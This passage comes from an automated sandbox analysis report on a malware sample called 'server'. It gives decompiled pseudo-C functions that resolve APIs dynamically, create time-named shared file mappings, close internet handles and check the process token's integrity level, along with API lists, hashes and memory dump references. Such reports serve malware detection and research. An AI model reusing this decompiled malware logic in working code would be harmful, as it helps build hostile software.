SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 02BD69A9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD69B5

Part of subcall function 02BD5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,035B9218,00000000,?,7476F710,00000000,7476F730), ref: 02BD52A0
Part of subcall function 02BD5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,035B9160,?,00000000,30314549,00000014,004F0053,035B9270), ref: 02BD533D
Part of subcall function 02BD5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD68B6), ref: 02BD534F

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02BD26E9,?,00000000,?,?), ref: 02BD69C8

Strings

@MqtNqt, xrefs: 02BD69C8
Uqt, xrefs: 02BD6945

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3521023985-3266969629
Opcode ID: ee0440dfe56f5fd976e45d12c63dcf0745f93e3e33dd9b4b03497282bedea237
Instruction ID: f308ec4990041714a6223cf679455c650ab0e3d07540649658dc7c9dc1b0773b
Opcode Fuzzy Hash: ee0440dfe56f5fd976e45d12c63dcf0745f93e3e33dd9b4b03497282bedea237
Instruction Fuzzy Hash: BD519C71449320AFC710AF15EC44EEBBBECEB88364F508A1AF9A9D2190E731D554CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7FC5 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E02BD7FC5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2bd0000;
				_t115 = _t139[3] + 0x2bd0000;
				_t131 = _t139[4] + 0x2bd0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2bd0000;
				_v16 = _t139[5] + 0x2bd0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2bd0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2bda1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2bda1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2bda1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2bda1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2bda1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2bda1b8; // 0x0
										 *_t102 = _t125;
										 *0x2bda1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2bda1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02bd7fd4
0x02bd7fea
0x02bd7ff0
0x02bd7ff2
0x02bd7ff7
0x02bd7ffd
0x02bd8002
0x02bd8005
0x02bd8013
0x02bd801a
0x02bd801d
0x02bd8020
0x02bd8021
0x02bd8024
0x02bd8027
0x02bd802a
0x02bd802f
0x02bd803e
0x00000000
0x02bd8044
0x02bd804e
0x02bd8058
0x02bd805d
0x02bd805f
0x02bd8069
0x02bd806c
0x02bd806f
0x02bd8075
0x02bd8077
0x02bd8077
0x02bd807a
0x02bd807d
0x02bd8082
0x02bd8086
0x02bd8099
0x02bd809b
0x02bd8143
0x02bd8143
0x02bd814a
0x02bd814d
0x02bd8157
0x02bd8157
0x02bd815b
0x02bd81d9
0x02bd81dc
0x02bd81de
0x02bd81de
0x02bd81e5
0x02bd81e7
0x02bd81f1
0x02bd81f4
0x02bd81f7
0x02bd81f7
0x00000000
0x02bd815d
0x02bd8160
0x02bd818e
0x02bd8198
0x02bd819c
0x02bd81a4
0x02bd81a7
0x02bd81ae
0x02bd81b8
0x02bd81b8
0x02bd81bc
0x02bd81c1
0x02bd81d0
0x02bd81d6
0x02bd81d6
0x02bd81bc
0x00000000
0x02bd8167
0x02bd816a
0x02bd8172
0x02bd8187
0x02bd818c
0x00000000
0x00000000
0x02bd818c
0x00000000
0x02bd8172
0x02bd8160
0x02bd815b
0x02bd80a1
0x02bd80a8
0x02bd80b8
0x02bd80bb
0x02bd80c1
0x02bd80c5
0x02bd8108
0x02bd8114
0x02bd813d
0x02bd8116
0x02bd811a
0x02bd8120
0x02bd8128
0x02bd812a
0x02bd812d
0x02bd8133
0x02bd8135
0x02bd8135
0x02bd8128
0x02bd811a
0x00000000
0x02bd8114
0x02bd80cd
0x02bd80d0
0x02bd80d7
0x02bd80e7
0x02bd80ea
0x02bd80fa
0x00000000
0x02bd8100
0x02bd80e1
0x02bd80e5
0x00000000
0x00000000
0x00000000
0x02bd80e5
0x02bd80b2
0x02bd80b6
0x00000000
0x00000000
0x00000000
0x02bd80b6
0x02bd808f
0x02bd8093
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BD803E
LoadLibraryA.KERNEL32(?), ref: 02BD80BB
GetLastError.KERNEL32 ref: 02BD80C7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02BD80FA

Strings

@MqtNqt, xrefs: 02BD80C7, 02BD819E
$, xrefs: 02BD8013

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $$@MqtNqt
API String ID: 948315288-516465142
Opcode ID: ed5b378069e8804e8da5ea9b029240be88e19d8a843f73956a601f4f5266d6ef
Instruction ID: 0b1b016626d66680b45b81000bb6bfd664ccf6bb07c3fcaa90eab7de0d617116
Opcode Fuzzy Hash: ed5b378069e8804e8da5ea9b029240be88e19d8a843f73956a601f4f5266d6ef
Instruction Fuzzy Hash: A6813971A01609AFDB14CF99D890BEEB7F5FB48741F148469E909E7240FB70E98ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD415A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E02BD415A(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02BD82D4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2bda348; // 0x9dd5a8
				_t5 = _t13 + 0x2bdb7b4; // 0x35b8d5c
				_t6 = _t13 + 0x2bdb644; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02BD7F3A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2bda34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02bd415a
0x02bd4162
0x02bd4166
0x02bd416c
0x02bd4171
0x02bd4176
0x02bd4179
0x02bd417c
0x02bd4181
0x02bd4182
0x02bd4185
0x02bd418a
0x02bd4191
0x02bd419b
0x02bd419d
0x02bd419e
0x02bd41a1
0x02bd41bd
0x02bd41c3
0x02bd41c7
0x02bd4215
0x02bd41c9
0x02bd41d6
0x02bd41e6
0x02bd41ee
0x02bd4200
0x02bd4204
0x00000000
0x00000000
0x02bd41f0
0x02bd41f3
0x02bd41f8
0x02bd41fa
0x02bd41fa
0x02bd41d8
0x02bd41da
0x02bd4206
0x02bd4207
0x02bd4207
0x02bd41d6
0x02bd421c

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53,?,?), ref: 02BD4166
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BD417C
_snwprintf.NTDLL ref: 02BD41A1
CreateFileMappingW.KERNELBASE(000000FF,02BDA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02BD41BD
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53,?), ref: 02BD41CF
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02BD41E6
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53), ref: 02BD4207
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53,?), ref: 02BD420F

Strings

@MqtNqt, xrefs: 02BD420F

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MqtNqt
API String ID: 1814172918-2883916605
Opcode ID: d84a997ceab386c5af0d2f24f8bc46b66386ba89fb57f138ad036a2b6d17aec1
Instruction ID: 5e9a41f6d29d3cd70edf1ec83b4820ebe4604ca82fc8b5c09a2cad0bae39d26d
Opcode Fuzzy Hash: d84a997ceab386c5af0d2f24f8bc46b66386ba89fb57f138ad036a2b6d17aec1
Instruction Fuzzy Hash: D421D272A81604BBD721AF68DC05FDE7BBAEB84794F154060F509E71C0FB709905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4BE7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E02BD4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E02BD16B2(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E02BD61DA(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E02BD61DA(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E02BD61DA(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E02BD61DA(_t46);
				}
				return _t24;
			}

0x02bd4be7
0x02bd4be7
0x02bd4be9
0x02bd4beb
0x02bd4bf2
0x02bd4bf9
0x02bd4bf9
0x02bd4bfe
0x02bd4c01
0x02bd4c08
0x02bd4c11
0x02bd4c15
0x02bd4c1a
0x02bd4c1a
0x02bd4c1c
0x02bd4c21
0x02bd4c25
0x02bd4c2a
0x02bd4c2a
0x02bd4c2c
0x02bd4c31
0x02bd4c35
0x02bd4c3a
0x02bd4c3a
0x02bd4c3c
0x02bd4c47
0x02bd4c4a
0x02bd4c4a
0x02bd4c4c
0x02bd4c51
0x02bd4c54
0x02bd4c54
0x02bd4c56
0x02bd4c5d
0x02bd4c60
0x02bd4c65
0x02bd4c68
0x02bd4c68
0x02bd4c6b
0x02bd4c70
0x02bd4c73
0x02bd4c73
0x02bd4c78
0x02bd4c7c
0x02bd4c7f
0x02bd4c7f
0x02bd4c84
0x02bd4c89
0x00000000
0x02bd4c8c
0x02bd4c93

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 02BD4C15
InternetCloseHandle.WININET(?), ref: 02BD4C1A
InternetSetStatusCallback.WININET(?,00000000), ref: 02BD4C25
InternetCloseHandle.WININET(?), ref: 02BD4C2A
InternetSetStatusCallback.WININET(?,00000000), ref: 02BD4C35
InternetCloseHandle.WININET(?), ref: 02BD4C3A
FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,02BD2248,?,?,747581D0,00000000,00000000), ref: 02BD4C4A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,02BD2248,?,?,747581D0,00000000,00000000), ref: 02BD4C54

Part of subcall function 02BD16B2: WaitForMultipleObjects.KERNEL32(00000002,02BD7C47,00000000,02BD7C47,?,?,?,02BD7C47,0000EA60), ref: 02BD16CD

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
String ID:
API String ID: 2172891992-0
Opcode ID: 1979fdad9db60fcdae1427e1620ffce1db3e06547f854a1a117596c27b94cf69
Instruction ID: e5f58242e3cc8ce3cdd4489c2ab3f0f8a88869a6e76b614a231a6d15dae9ce10
Opcode Fuzzy Hash: 1979fdad9db60fcdae1427e1620ffce1db3e06547f854a1a117596c27b94cf69
Instruction Fuzzy Hash: 2E112E76A006586BC630AFAAED84C9BB7FEFF452083594D58E089D3511E734F8898E60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD5E40 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E02BD5E40(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2bda2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02BD33DC(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02BD61DA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02bd5e4d
0x02bd5e54
0x02bd5e5b
0x02bd5e6f
0x02bd5e7a
0x02bd5e92
0x02bd5e9f
0x02bd5ea2
0x02bd5ea7
0x02bd5eb2
0x02bd5eb6
0x02bd5ec5
0x02bd5ec9
0x02bd5ee5
0x02bd5ee5
0x02bd5ee9
0x02bd5ee9
0x02bd5eee
0x02bd5ef2
0x02bd5ef8
0x02bd5ef9
0x02bd5f00
0x02bd5f06

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BD5E72
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BD5E92
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BD5EA2
CloseHandle.KERNEL32(00000000), ref: 02BD5EF2

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BD5EC5
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BD5ECD
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BD5EDD

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: cb08f32ad7f486109e71db323ce44b36c80c4306d266bd33c8ffef6d99245ec9
Instruction ID: bb2af44bb39a428b8bd18b82a3bf507812133f7a756b75bee504989201f155b0
Opcode Fuzzy Hash: cb08f32ad7f486109e71db323ce44b36c80c4306d266bd33c8ffef6d99245ec9
Instruction Fuzzy Hash: 10214875D00209BFEB10EFA4DC84EEEBBB9EB48344F4000A5E910A7191EB718A54DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD6675 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E02BD6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2bda348; // 0x9dd5a8
				_t1 = _t9 + 0x2bdb516; // 0x253d7325
				_t36 = 0;
				_t28 = E02BD5815(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x35b9601
					_t40 = E02BD33DC(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E02BD5063(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E02BD61DA(_t40);
						_t42 = E02BD4AC7(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02BD61DA(_t36);
							_t36 = _t42;
						}
						_t43 = E02BD2708(_t36, _t33);
						if(_t43 != 0) {
							E02BD61DA(_t36);
							_t36 = _t43;
						}
					}
					E02BD61DA(_t28);
				}
				return _t36;
			}

0x02bd6675
0x02bd6678
0x02bd6679
0x02bd6680
0x02bd6687
0x02bd668e
0x02bd6692
0x02bd6699
0x02bd66a0
0x02bd66a5
0x02bd66ad
0x02bd66b7
0x02bd66bb
0x02bd66bf
0x02bd66c5
0x02bd66ca
0x02bd66d4
0x02bd66da
0x02bd66dc
0x02bd66f3
0x02bd66f7
0x02bd66fa
0x02bd66ff
0x02bd66ff
0x02bd6708
0x02bd670c
0x02bd670f
0x02bd6714
0x02bd6714
0x02bd670c
0x02bd6717
0x02bd671c
0x02bd6722

APIs

Part of subcall function 02BD5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD668E,253D7325,00000000,00000000,?,775EC740,02BD3ECE), ref: 02BD587C
Part of subcall function 02BD5815: sprintf.NTDLL ref: 02BD589D

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A0
lstrlen.KERNEL32(00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A8

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

strcpy.NTDLL ref: 02BD66BF
lstrcat.KERNEL32(00000000,00000000), ref: 02BD66CA

Part of subcall function 02BD5063: lstrlen.KERNEL32(00000000,00000000,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD5074

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66E7

Part of subcall function 02BD4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02BD66F3,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD4AD1
Part of subcall function 02BD4AC7: _snprintf.NTDLL ref: 02BD4B2F

Strings

=, xrefs: 02BD66E1

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 7f071512f0f719438a62fc5de63cf8870cd38549608036725d0502d897243c1a
Instruction ID: e6b95b7ac81611b7d13be6f8ced7b59c1d0de25cd9ef029919476b0d4e60fa5b
Opcode Fuzzy Hash: 7f071512f0f719438a62fc5de63cf8870cd38549608036725d0502d897243c1a
Instruction Fuzzy Hash: DE115136D01529674722BB68AC94CEE37AE9F457A83054095F904E7101FE74DD065FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00401202 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004012E6(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401BA9(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E0040110B(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
